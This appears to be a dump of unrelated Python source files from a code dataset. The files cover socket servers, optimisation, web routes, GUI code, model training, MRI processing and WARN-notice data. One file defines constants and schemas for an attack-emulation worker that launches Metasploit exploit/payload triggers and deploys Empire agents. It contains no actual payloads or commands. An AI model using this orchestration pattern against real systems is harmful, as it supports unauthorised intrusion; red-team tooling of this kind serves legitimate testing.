client_socket: 与客户端连接的 socket
address: 客户端地址
"""
self.dispatcher.add_client(client_socket, address)
def got_command_cb(self, command):
"""接收到来自控制端口的指令的回调函数
Args:
command: 待处理的命令
"""
if command == 'reset server':
old_dispatcher = self.dispatcher
self.dispatcher = DispatcherThread(self.pcb_manager.on_recv_heartbeat)
old_dispatcher.running = False
self.dispatcher.start()
elif command == 'list':
self.controller.msg_queue.put('client count: %d\r\n' % len(self.dispatcher.clients))
for _id, sender in self.dispatcher.clients.copy().items():
self.controller.msg_queue.put('%d: %s, %d\r\n' % (sender.sender_id, sender.address, sender.send_count))
elif command == 'pcb':
self.controller.msg_queue.put(self.pcb_manager.get_active_pcbs_info())
def exit_by_signal(self, signum, frame):
self.is_interrupt = True
def wait_for_keyboard(self):
"""quit when press q or press ctrl-c, or exception from other threads"""
try:
print("enter 'q' to quit")
while input() != 'q':
print("enter 'q' to quit. rcv count: %d, client count: %d"
% (self.client.rcv_count, len(self.dispatcher.clients)))
if not self.client.running or not self.server.running:
break
except KeyboardInterrupt:
pass
except EOFError:
# no input
signal.signal(signal.SIGINT, self.exit_by_signal)
while not self.is_interrupt:
time.sleep(1)
if not self.client.running or not self.server.running:
break
def main(self):
# config
config_file_name = os.path.join(sys.path[0], 'conf/config.json')
try:
with open(config_file_name) as config_fp:
configs = json.load(config_fp)
except:
print('failed to load config from config.json.')
return
# log init
log.initialize_logging(configs['enableLog'].lower() == 'true')
log.info('main: start')
# threads
self.server = ServerThread(configs['listenPort'], self.got_client_cb)
self.controller = ControlThread(configs['controlPort'], self.got_command_cb)
self.dispatcher = DispatcherThread(self.pcb_manager.on_recv_heartbeat)
self.client = ClientThread(configs['serverIpAddress'], configs['serverPort'], self.got_data_cb)
self.server.start()
self.controller.start()
self.dispatcher.start()
self.client.start()
# wait
self.wait_for_keyboard()
# quit & clean up
self.controller.running = False
self.controller.join()
self.client.running = False
self.client.join()
self.server.running = False
self.server.join()
self.dispatcher.running = False
self.dispatcher.join()
log.info('main: bye')
| 2.265625
| 2
|
src/lib/approximation/dense.py
|
evolutics/sparse-approximation
| 0
|
12782881
|
"""
Minimizes D(b, Ax) for x ∈ ℝ₊^N where aₙ, b ∈ ℝ₊^M and D is a divergence.
These occur as ingredients of algorithms for the sparse case.
"""
import cvxpy
import numpy
def euclidean(A, b):
return _solve_convex(A, b, lambda p, q: cvxpy.norm2(p - q))
def total_variation(A, b):
return _solve_convex(A, b, lambda p, q: 0.5 * cvxpy.norm1(p - q))
def _solve_convex(A, b, D):
x = cvxpy.Variable(A.shape[1])
objective = cvxpy.Minimize(D(b, A @ x))
constraints = [x >= 0]
problem = cvxpy.Problem(objective, constraints)
problem.solve()
status = problem.status
assert status == cvxpy.OPTIMAL, f"Unable to solve optimization problem: {status}"
x = x.value
x[numpy.isclose(x, 0)] = 0
return x
| 2.90625
| 3
|
day09/shetuproject/shetuproject/spiders/start.py
|
Mhh123/spider
| 0
|
12782882
|
<reponame>Mhh123/spider
from scrapy import cmdline
cmdline.execute(['scrapy', 'crawl', 'image'])
| 1.859375
| 2
|
tools/commands/laravel.py
|
vertexportus/devdock
| 5
|
12782883
|
<gh_stars>1-10
import argparse
import re
from commands import base_command
from utils import env, file_regex_replace
class Laravel(base_command.BaseCommand):
@staticmethod
def argparse(parser, subparsers):
parser_main = subparsers.add_parser('laravel', help="runs artisan inside a laravel container")
parser_main.add_argument('-p', '--project', nargs="?", help="set laravel project to run composer on")
parser_main.add_argument('params', nargs=argparse.REMAINDER, help='artisan parameters')
def process_command(self):
project = self.get_project_by_name_or_default_by_tech(self.args.project, 'laravel')
container = project.get_container_by_tech('laravel')
if container is None:
raise Exception(f"container not found by stack")
params = ' '.join(self.args.params) if len(self.args.params) else ''
if 'key:generate' in self.args.params:
params = f"{params} --show"
key = self.container_exec_run_get_output(container.fullname, f"php artisan {params}")
file_regex_replace(env.project_path(f".{container.service.name}.env"), r"APP_KEY=[a-zA-Z0-9:]*\n", f"APP_KEY={key.strip()}\n")
else:
self.container_exec_run(container.fullname, f"php artisan {params}")
| 2.4375
| 2
|
api/urls.py
|
ferrumie/multi-pay
| 0
|
12782884
|
from django.urls import path
from api.authentication import CustomAuthToken
from api.views import (
ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView,
RegisterUserView, TransactionList)
urlpatterns = [
# Register
path('user/register/', RegisterUserView.as_view(), name="register-user"),
path('user/view-token/', CustomAuthToken.as_view(), name='token-view'),
# Transaction List
path('transactions/', TransactionList.as_view(), name='transaction-list'),
# API Key
path('user/apikeys/', ApiKeyView.as_view(), name='apikeys'),
path('user/apikeys/<int:key_id>/',
ApiKeyDetail.as_view(), name='apikey-detail'),
# Payment
path('payment/', PaymentView.as_view(), name='payment'),
path('payment/confirm/', PaymentConfirmationView.as_view(),
name='payment-confirm'),
]
| 1.820313
| 2
|
java2s/toolbarbuttons.py
|
mhcrnl/PmwTkEx
| 0
|
12782885
|
<reponame>mhcrnl/PmwTkEx
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Utilizarea importului multiplu pt functionarea codului in Python 2 si Python3
try:
#Python 2
import Tkinter as tk
except ImportError:
#Python 3
import tkinter as tk
title = "Toolbar Buttons"
geometry = "400x400+100+100"
class ToolbarButtons():
def __init__(self, master):
self.master = master
#Begin/adaugare toolbar in fereastra-----------------------
toolbar=tk.Frame(master)
#-------------------------BEGIN/Adaugare buton New
fotoNew =tk.PhotoImage(file="reflectionsm.GIF")
newBtn = tk.Button(toolbar, text="New", image=fotoNew, compound="left")
newBtn.pack(side="left", padx=2, pady=2)
newBtn.image=fotoNew
#-------------------------END/Adaugare buton New
openBtn=tk.Button(toolbar, text="Open", width=6)
openBtn.pack(side="right", padx=2, pady=2)
#-------------------------END/Add Button Open
fotoClose=tk.PhotoImage(file='close.gif')
closeBtn=tk.Button(toolbar, text="Close", image=fotoClose,
compound="left", height=20, command=master.quit)
closeBtn.pack(side="right", padx=2, pady=2)
closeBtn.image=fotoClose
toolbar.pack(side="top", fill="x")
#END/Adaugare toolbar in fereastra ------------------------
if __name__ == "__main__":
root = tk.Tk()
root.title(title)
root.geometry(geometry)
ToolbarButtons(root)
root.mainloop()
root.destroy()
| 2.625
| 3
|
cryton_worker/lib/util/constants.py
|
slashsec-edu/cryton-worker
| 0
|
12782886
|
from datetime import datetime
from schema import Optional, Or
# Main queue constants
ACTION = "action"
CORRELATION_ID = "correlation_id"
DATA = "data"
RESULT_PIPE = "result_pipe"
QUEUE_NAME = "queue_name"
PROPERTIES = "properties"
HIGH_PRIORITY = 0
MEDIUM_PRIORITY = 1
LOW_PRIORITY = 2
# Processor action types
ACTION_KILL_TASK = "_kill_task"
ACTION_FINISH_TASK = "_finish_task"
ACTION_START_TRIGGER = "_start_trigger"
ACTION_STOP_TRIGGER = "_stop_trigger"
ACTION_LIST_TRIGGERS = "_list_triggers"
ACTION_SEND_MESSAGE = "_send_message"
ACTION_SHUTDOWN_THREADED_PROCESSOR = "shutdown_threaded_processor"
# Event types
EVENT_VALIDATE_MODULE = "VALIDATE_MODULE"
EVENT_LIST_MODULES = "LIST_MODULES"
EVENT_LIST_SESSIONS = "LIST_SESSIONS"
EVENT_KILL_STEP_EXECUTION = "KILL_STEP_EXECUTION"
EVENT_HEALTH_CHECK = "HEALTH_CHECK"
EVENT_START_TRIGGER = "START_TRIGGER"
EVENT_STOP_TRIGGER = "STOP_TRIGGER"
EVENT_TRIGGER_STAGE = "TRIGGER_STAGE"
EVENT_LIST_TRIGGERS = "LIST_TRIGGERS"
# Trigger types
HTTP = "HTTP"
MSF = "MSF"
# Trigger constants
TRIGGER_HOST = "host"
TRIGGER_PORT = "port"
TRIGGER_TYPE = "trigger_type"
TRIGGER_STAGE_EXECUTION_ID = "stage_execution_id"
TRIGGER_PARAMETERS = "parameters"
TRIGGER_ID = "trigger_id"
EXPLOIT = "exploit"
PAYLOAD = "payload"
EXPLOIT_ARGUMENTS = "exploit_arguments"
PAYLOAD_ARGUMENTS = "payload_arguments"
# Step types
STEP_TYPE = "step_type"
STEP_TYPE_EXECUTE_ON_WORKER = 'cryton/execute-on-worker'
STEP_TYPE_DEPLOY_AGENT = 'empire/deploy-agent'
STEP_TYPE_EXECUTE_ON_AGENT = 'empire/execute-on-agent'
# RabbitMQ message keywords
EVENT_T = "event_t"
EVENT_V = "event_v"
ARGUMENTS = "arguments"
DEFAULT_MSG_PROPERTIES = {"content_encoding": "utf-8", 'timestamp': datetime.now()}
TARGET_IP = "target_ip"
SESSION_LIST = "session_list"
MODULE_LIST = "module_list"
TRIGGER_LIST = "trigger_list"
ACK_QUEUE = "ack_queue"
# Step type execute-on-worker arguments keywords
ATTACK_MODULE = "attack_module"
ATTACK_MODULE_ARGUMENTS = "attack_module_args"
# Step type execute-on-agent arguments keywords
USE_AGENT = "use_agent"
EMPIRE_MODULE = "empire_module"
EMPIRE_MODULE_ARGUMENTS = "empire_module_args"
EMPIRE_SHELL_COMMAND = "shell_command"
# Step type deploy-agent arguments keywords
STAGER_ARGUMENTS = "stager_arguments"
STAGER_ARGS_STAGER_TYPE = "stager_type"
STAGER_ARGS_TARGET_OS_TYPE = "os_type"
STAGER_ARGS_LISTENER_TYPE = "listener_type"
STAGER_ARGS_LISTENER_NAME = "listener_name"
STAGER_ARGS_LISTENER_PORT = "listener_port"
STAGER_ARGS_AGENT_NAME = "agent_name"
STAGER_ARGS_STAGER_OPTIONS = "stager_options"
STAGER_ARGS_LISTENER_OPTIONS = "listener_options"
# Session system keywords
SESSION_ID = 'session_id'
CREATE_NAMED_SESSION = 'create_named_session'
USE_NAMED_SESSION = 'use_named_session'
USE_ANY_SESSION_TO_TARGET = 'use_any_session_to_target'
SSH_CONNECTION = 'ssh_connection'
# Other constants
RETURN_CODE = "return_code"
STD_ERR = "std_err"
STD_OUT = "std_out"
CODE_ERROR = -2
CODE_OK = 0
CODE_KILL = -3
FILE = "file"
FILE_CONTENT = "file_content"
FILE_ENCODING = "file_encoding"
BASE64 = "base64"
UTF8 = "utf8"
REPLY_TO = "reply_to"
# ControlTask validation schemas
EVENT_VALIDATE_MODULE_SCHEMA = {ATTACK_MODULE: str, ATTACK_MODULE_ARGUMENTS: dict}
EVENT_LIST_MODULES_SCHEMA = dict
EVENT_LIST_SESSIONS_SCHEMA = {Optional(Or("type", "tunnel_local", "tunnel_peer", "via_exploit", "via_payload", "desc",
"info", "workspace", "session_host", "session_port", "target_host",
"username", "uuid", "exploit_uuid", "routes", "arch")): Or(str, int)}
EVENT_KILL_STEP_EXECUTION_SCHEMA = {"correlation_id": str}
EVENT_HEALTH_CHECK_SCHEMA = {}
EVENT_START_TRIGGER_HTTP_SCHEMA = {"host": str, "port": int, "trigger_type": "HTTP", "reply_to": str, "routes": [
{"path": str, "method": str, "parameters": [{"name": str, "value": str}]}]}
EVENT_START_TRIGGER_MSF_SCHEMA = {"host": str, "port": int, "exploit": str,
Optional("exploit_arguments"): {Optional(str): Or(str, int)},
"payload": str, Optional("payload_arguments"): {Optional(str): Or(str, int)},
"trigger_type": "MSF", "reply_to": str}
EVENT_STOP_TRIGGER_SCHEMA = {"trigger_id": str}
EVENT_LIST_TRIGGERS_SCHEMA = {}
| 2
| 2
|
datasets/spmotif_dataset.py
|
Wuyxin/DIR-GNN
| 34
|
12782887
|
import os.path as osp
import pickle as pkl
import torch
import random
import numpy as np
from torch_geometric.data import InMemoryDataset, Data
class SPMotif(InMemoryDataset):
splits = ['train', 'val', 'test']
def __init__(self, root, mode='train', transform=None, pre_transform=None, pre_filter=None):
assert mode in self.splits
self.mode = mode
super(SPMotif, self).__init__(root, transform, pre_transform, pre_filter)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(mode))
self.data, self.slices = torch.load(self.processed_paths[idx])
@property
def raw_file_names(self):
return ['train.npy', 'val.npy', 'test.npy']
@property
def processed_file_names(self):
return ['SPMotif_train.pt', 'SPMotif_val.pt', 'SPMotif_test.pt']
def download(self):
if not osp.exists(osp.join(self.raw_dir, 'raw', 'SPMotif_train.npy')):
print("raw data of `SPMotif` doesn't exist, please redownload from our github.")
raise FileNotFoundError
def process(self):
idx = self.raw_file_names.index('{}.npy'.format(self.mode))
edge_index_list, label_list, ground_truth_list, role_id_list, pos = np.load(osp.join(self.raw_dir, self.raw_file_names[idx]), allow_pickle=True)
data_list = []
for idx, (edge_index, y, ground_truth, z, p) in enumerate(zip(edge_index_list, label_list, ground_truth_list, role_id_list, pos)):
edge_index = torch.from_numpy(edge_index)
edge_index = torch.tensor(edge_index, dtype=torch.long)
node_idx = torch.unique(edge_index)
assert node_idx.max() == node_idx.size(0) - 1
x = torch.zeros(node_idx.size(0), 4)
index = [i for i in range(node_idx.size(0))]
x[index, z] = 1
x = torch.rand((node_idx.size(0), 4))
edge_attr = torch.ones(edge_index.size(1), 1)
y = torch.tensor(y, dtype=torch.long).unsqueeze(dim=0)
data = Data(x=x, y=y, z=z,
edge_index=edge_index,
edge_attr=edge_attr,
pos=p,
edge_gt_att=torch.LongTensor(ground_truth),
name=f'SPMotif-{self.mode}-{idx}', idx=idx)
if self.pre_filter is not None and not self.pre_filter(data):
continue
if self.pre_transform is not None:
data = self.pre_transform(data)
data_list.append(data)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(self.mode))
print(self.processed_paths[idx])
print(len(data_list))
torch.save(self.collate(data_list), self.processed_paths[idx])
| 2.21875
| 2
|
src/experiment.py
|
rainwangphy/cgate
| 15
|
12782888
|
<gh_stars>10-100
"""Experiments infrastructure.
This module contains functions with preparations for an experiment.
"""
import os
from config import cfg
def init():
r"""
Checks, if results folder has already been used and prevents overwriting of the results.
Returns:
None
"""
old, new = cfg.RESULTS_ROOT / 'cfg.py', cfg.ROOT_DIR / 'config' / 'cfg.py'
if old.exists():
if os.system(f'cmp --silent {old} {new}'):
raise EnvironmentError('Config file in RESULTS_ROOT already exists and differs from the one in config/')
os.system(f'cp {new} {old}')
| 2.515625
| 3
|
msm_pele/AdaptivePELE/freeEnergies/extendTrajectories.py
|
danielSoler93/msm_pele
| 13
|
12782889
|
<gh_stars>10-100
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import glob
import os
import re
import sys
import argparse
import ast
def parseArguments():
desc = "Program that extends trajectories.\n\
Trajectories are joined with those from which the spawning cluster was discovered\n\
Two options are available:\n\
*) full: Trajectories are traced back to epoch 0\n\
*) prev: Trajectories are extended with up to the last 'lagtime' snapshots of a previous trajectory\n"
parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--type", choices=['full', 'prev'], default='prev', help="Traj reconstruction type")
parser.add_argument("-l", "--lagtime", default=0, type=int, help="Lagtime to be used (if proceeds)")
parser.add_argument("--outputDir", default="allTrajs_reconstructed", help="Output directory")
parser.add_argument("--inputDir", default="allTrajs", help="Directory with trajectories")
args = parser.parse_args()
return args.type, args.lagtime, args.outputDir, args.inputDir
def tryToOpenMapping(mapFilename):
try:
with open(mapFilename) as f:
mapping = f.read().split(":")
opened = True
except:
mapping = None
opened = False
return mapping, opened
def sameCoords(coords1, coords2):
threshold = 1e-4
diff = np.abs(coords1 - coords2)
return (diff < threshold).all()
def checkFirstMatchingSnapshot(traj, snapshot, coords):
for i in range(snapshot, traj.shape[0]):
if sameCoords(coords[1:], traj[i, 1:]): # coords[0] is the snapshot num, which is not important and is discarded in MSM
firstMatchingSnapshot = i
return firstMatchingSnapshot
raise IndexError
def findSnapshotAndOpenTraj(trajName, lastSnapshot, coords, firstSnapshot=0):
if lastSnapshot is None or coords is None:
return np.loadtxt(trajName)[firstSnapshot:]
else:
traj = np.loadtxt(trajName)
try:
snapshot = checkFirstMatchingSnapshot(traj, lastSnapshot, coords)
return traj[firstSnapshot:snapshot]
except IndexError:
sys.exit("Did not find matching traj in trajName: %s; coords:%s, from snapshot:%d" % (trajName, coords, lastSnapshot))
def reconstructFullTrajectory(mapping, thisTrajMap, trajNameTempletized, coords):
"""
thisTrajMap contains the exact point at which a cluster was discovered
Note that the number of snapshot corresponds to the accepted steps and
not absolute steps. There are different ways to overcome the limitation.
The fastest is looking at the report file. A slower way is looking at
the exact coordinates. It is slower, but the main advantage is that we
do not need any extra file.
"""
(epoch, num, snapshot) = thisTrajMap
try:
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, coords)
except: # this is due to an error in adaptiveSampling. Once the bug is found, please remove the except block
epoch += 1
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, coords)
if epoch == 0:
return thisTraj
else:
prevTrajMap = ast.literal_eval(mapping[epoch][num-1])
return np.vstack((reconstructFullTrajectory(mapping, prevTrajMap, trajNameTempletized, thisTraj[0]), thisTraj))
def addUncountedSnapshots(mapping, thisTrajMap, trajNameTempletized, coords, lagtime):
"""
This function adds all possible previous uncounted snapshots
(i.e. those in the last lagtime snapshots) to the current traj
thisTrajMap contains the exact point at which a cluster was discovered
Note that the number of snapshot corresponds to the accepted steps and
not absolute steps. There are different ways to overcome the limitation.
The fastest is looking at the report file. A slower way is looking at
the exact coordinates. It is slower, but the main advantage is that we
do not need any extra file.
"""
(epoch, num, snapshot) = thisTrajMap
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, None)
if epoch == 0:
return thisTraj
prevTrajMap = ast.literal_eval(mapping[epoch][num-1])
(epoch, num, snapshot) = prevTrajMap
try:
# only consider the last "lagtime" snapshots
# if the initial point was found before the last lagtime snapshots, then: prevTraj = []
prevTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, thisTraj[0], firstSnapshot=-lagtime)
except:
epoch += 1
prevTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, thisTraj[0], firstSnapshot=-lagtime)
return np.vstack((prevTraj, thisTraj))
def main():
choice, lagtime, outputDir, inputDir = parseArguments()
mapFilename = "%d/processorMapping.txt"
if not os.path.exists(outputDir):
os.makedirs(outputDir)
trajWildcard = "traj_%d_*.dat" # %d for the epoch
trajName = "traj_%d_%d.dat" # %d for the epoch and number
trajNameTempletized = os.path.join(inputDir, trajName)
allFolders = os.listdir(".")
epochFolders = [int(re.sub("MSM_", "", epoch)) for epoch in allFolders if epoch.startswith("MSM")]
numberOfEpochs = max(epochFolders)
mappings = []
for epoch in range(0, numberOfEpochs):
epochMapping, _ = tryToOpenMapping(mapFilename % epoch)
mappings.append(epochMapping)
newSizes = []
for epoch in range(0, numberOfEpochs):
allFiles = glob.glob(os.path.join(inputDir, trajWildcard % epoch))
for source in allFiles:
print(source)
num = int(source.split("_")[-1][:-4])
if choice == "full":
fullTraj = reconstructFullTrajectory(mappings, (epoch, num, None), trajNameTempletized, None)
elif choice == "prev":
fullTraj = addUncountedSnapshots(mappings, (epoch, num, None), trajNameTempletized, None, lagtime)
newSizes.append(fullTraj.shape[0])
fname = os.path.split(source)[-1]
dst = os.path.join(outputDir, fname)
np.savetxt(dst, fullTraj)
newSizes = np.array(newSizes)
avgNewSize = np.average(newSizes)
print("")
print("Avg new size: %.2f +/- %.2f" % (avgNewSize, np.std(newSizes)))
try:
origSize = np.loadtxt(allFiles[0]).shape[0]
print("Assuming orig trajectories of %d steps" % origSize)
print("New trajectories are {0:.2f}% larger".format((avgNewSize/origSize - 1)*100))
except:
pass
if __name__ == "__main__":
main()
| 2.578125
| 3
|
src/models/train_model.py
|
ralucaj/dtu_mlops
| 0
|
12782890
|
import logging
import hydra
import torch
from model import MyAwesomeModel
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch.utils.data import DataLoader
from src.data.mnist import CorruptedMNIST
log = logging.getLogger(__name__)
@hydra.main(config_path="configs", config_name="mnist_config.yaml")
def train(cfg):
print("Training day and night")
model = MyAwesomeModel(cfg.model)
train_loader = DataLoader(
CorruptedMNIST(cfg.training.train_set), batch_size=cfg.training.batch_size
)
validation_loader = DataLoader(
CorruptedMNIST(cfg.training.valid_set), batch_size=cfg.training.batch_size
)
early_stopping_callback = EarlyStopping(
monitor="valid_loss", patience=3, verbose=True, mode="min"
)
trainer = Trainer(
max_epochs=cfg.training.epochs,
accelerator="gpu",
gpus=1,
limit_train_batches=cfg.training.limit_train_batches,
callbacks=[early_stopping_callback],
)
trainer.fit(
model, train_dataloaders=train_loader, val_dataloaders=validation_loader
)
# Save model
torch.save(model.state_dict(), cfg.training.model_path)
script_model = torch.jit.script(model)
script_model.save('deployable_model.pt')
train()
| 2.234375
| 2
|
seraphim/util/reducible_helper.py
|
kluhan/seraphim
| 0
|
12782891
|
<gh_stars>0
from seraphim.finite_fields.polynomial import Polynomial
from seraphim.mod_arithmetics.modulare_arithmetic_efficient import RestclassEfficient
def is_reducible(polynom, p):
intmod = RestclassEfficient(1, p).get_representative()
zmodx = [Polynomial(list(reversed(x))) for x in intmod]
zero = polynom - polynom
for m in zmodx:
if m.deg() > 0 and polynom % m == zero:
return True, m
return False
| 2.890625
| 3
|
scripts/01_MEGRE/05_split_echoes.py
|
ofgulban/meso-MRI
| 1
|
12782892
|
"""Split each echo to prepare for registration."""
import os
import subprocess
import numpy as np
import nibabel as nb
# =============================================================================
NII_NAMES = [
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-01_dir-AP_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-02_dir-RL_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-03_dir-PA_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-04_dir-LR_part-mag_MEGRE_crop.nii.gz',
]
OUTDIR = "/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/05_split_echoes"
# =============================================================================
print("Step_05: Split echoes.")
# Output directory
if not os.path.exists(OUTDIR):
os.makedirs(OUTDIR)
print(" Output directory: {}".format(OUTDIR))
# Average across echoes
for i, nii_name in enumerate(NII_NAMES):
# Load data
nii = nb.load(nii_name)
temp = np.squeeze(np.asanyarray(nii.dataobj))
# Save each echo separately
basename, ext = nii.get_filename().split(os.extsep, 1)
basename = os.path.basename(basename)
out_name = os.path.join(OUTDIR, basename)
for j in range(temp.shape[-1]):
echo = np.squeeze(temp[..., j])
img = nb.Nifti1Image(echo, affine=nii.affine, header=nii.header)
nb.save(img, '{}_echo{}.nii.gz'.format(out_name, j+1))
print(' Finished.')
| 1.90625
| 2
|
warn_transformer/transformers/in.py
|
chriszs/warn-transformer
| 3
|
12782893
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Indiana raw data for consolidation."""
postal_code = "IN"
fields = dict(
company="Company",
location="City",
notice_date="Notice Date",
effective_date="LO/CL Date",
jobs="Affected Workers",
)
date_format = ["%m/%d/%Y", "%m/%d/%y", "%B %Y", "%Y", "%b %Y", "%m/%Y"]
jobs_corrections = {
"97 (in MI)0 (in IN)": 0,
"100+": 100,
"62 MAY be affected": 62,
"5 in Indiana": 5,
"Unknown": None,
"75 in Indiana": 75,
"40-50": 40,
"100-130": 100,
"4 Hoosiers": 4,
"Undisclosed at this time": None,
"500 Nationwide": None,
"NA": None,
"103 (REVISED) 10/22/2020 108": 103,
}
date_corrections = {
"01/30/1202": datetime(2012, 1, 30),
"April/June 2020": datetime(2020, 4, 1),
"Unknown": None,
"Q1 2019": datetime(2019, 1, 1),
"Q1 2018": datetime(2018, 1, 1),
"Sept. 2016": datetime(2016, 9, 1),
"No closure date announced. Layoffs to commence 05/27/2015": datetime(
2015, 5, 27
),
"TBD": None,
"09/22/2014-12/07/2014": datetime(2014, 9, 22),
"08/18/2014-12/31/2014": datetime(2014, 8, 18),
"End of 2013": datetime(2013, 12, 31),
"Mid-Year 2014": datetime(2014, 6, 15),
"02/29/2013": datetime(2013, 2, 28),
"year end 2014": datetime(2014, 12, 31),
"4th Qtr 2012": datetime(2012, 9, 1),
"Mid February 2012": datetime(2012, 2, 14),
"3rd Qtr 2012": datetime(2012, 6, 1),
"LO-01/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"Prior to the end of 2009 (as stated in the WARN notice)": datetime(
2009, 12, 31
),
"No closure date announced. Layoffs": None,
"1st Quarter 2009": datetime(2009, 1, 1),
"02/02/2009\xa0to\xa0\xa012/30/2009": datetime(2009, 2, 2),
"3rd Quarter of 2009": datetime(2009, 6, 1),
"August to December 2008": datetime(2008, 8, 1),
"10/37/2008": datetime(2008, 10, 27),
"2/29/2013": datetime(2013, 2, 28),
"LO-1/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"3rd quarter of 2009": datetime(2009, 6, 1),
}
def prep_row_list(
self, row_list: typing.List[typing.Dict]
) -> typing.List[typing.Dict]:
"""Make necessary transformations to the raw row list prior to transformation.
Args:
row_list (list): A list of raw rows of data from the source.
Returns: The row list minus empty records
"""
# Do the standard stuff
row_list = super().prep_row_list(row_list)
# Cut rows with data-free revisions
return [r for r in row_list if r["Affected Workers"] != "N/A"]
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
Returns: A date object ready for consolidation. Or, if the date string is invalid, a None.
"""
# Try corrections before we edit the string
try:
dt = self.date_corrections[value]
if dt:
return str(dt.date())
else:
assert dt is None
return dt
except KeyError:
pass
# A little custom clean up based on the weird stuff from this source
value = value.replace("starting", "")
value = value.strip().split(" and ")[0].strip()
value = value.strip().split(" to ")[0].strip()
value = value.strip().split(" through ")[0].strip()
value = value.strip().split(" - ")[0].strip()
value = value.strip().split(" & ")[0].strip()
value = value.strip().split("\xa0to ")[0].strip()
value = value.strip().split(" – ")[0].strip()
value = value.strip().split("-")[0].strip()
# The same old stuff
return super().transform_date(value)
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
whitelist = ["CL", "CL -Relocating", "LO and CL", "LO/CL", "PENDING CL"]
return row["Notice Type"] in whitelist or None
| 2.6875
| 3
|
python/mbox/lego/box/block_settings_ui.py
|
chowooseoung/mbox
| 0
|
12782894
|
<filename>python/mbox/lego/box/block_settings_ui.py
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'block_settings_ui.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_Form(object):
def setupUi(self, Form):
if not Form.objectName():
Form.setObjectName(u"Form")
Form.resize(452, 518)
self.gridLayout = QGridLayout(Form)
self.gridLayout.setObjectName(u"gridLayout")
self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
self.gridLayout.addItem(self.verticalSpacer, 5, 0, 1, 1)
self.groupBox = QGroupBox(Form)
self.groupBox.setObjectName(u"groupBox")
sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.gridLayout_2 = QGridLayout(self.groupBox)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.host_label = QLabel(self.groupBox)
self.host_label.setObjectName(u"host_label")
self.horizontalLayout_2.addWidget(self.host_label)
self.host_lineEdit = QLineEdit(self.groupBox)
self.host_lineEdit.setObjectName(u"host_lineEdit")
self.horizontalLayout_2.addWidget(self.host_lineEdit)
self.host_pushButton = QPushButton(self.groupBox)
self.host_pushButton.setObjectName(u"host_pushButton")
self.horizontalLayout_2.addWidget(self.host_pushButton)
self.gridLayout_2.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox, 2, 0, 1, 1)
self.groupBox_4 = QGroupBox(Form)
self.groupBox_4.setObjectName(u"groupBox_4")
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.gridLayout_8 = QGridLayout(self.groupBox_4)
self.gridLayout_8.setObjectName(u"gridLayout_8")
self.gridLayout_7 = QGridLayout()
self.gridLayout_7.setObjectName(u"gridLayout_7")
self.gridLayout_9 = QGridLayout()
self.gridLayout_9.setObjectName(u"gridLayout_9")
self.color_fk_label = QLabel(self.groupBox_4)
self.color_fk_label.setObjectName(u"color_fk_label")
sizePolicy1 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.color_fk_label.sizePolicy().hasHeightForWidth())
self.color_fk_label.setSizePolicy(sizePolicy1)
self.color_fk_label.setMinimumSize(QSize(0, 0))
self.gridLayout_9.addWidget(self.color_fk_label, 0, 1, 1, 1)
self.color_fk_spinBox = QSpinBox(self.groupBox_4)
self.color_fk_spinBox.setObjectName(u"color_fk_spinBox")
sizePolicy2 = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
sizePolicy2.setHorizontalStretch(0)
sizePolicy2.setVerticalStretch(0)
sizePolicy2.setHeightForWidth(self.color_fk_spinBox.sizePolicy().hasHeightForWidth())
self.color_fk_spinBox.setSizePolicy(sizePolicy2)
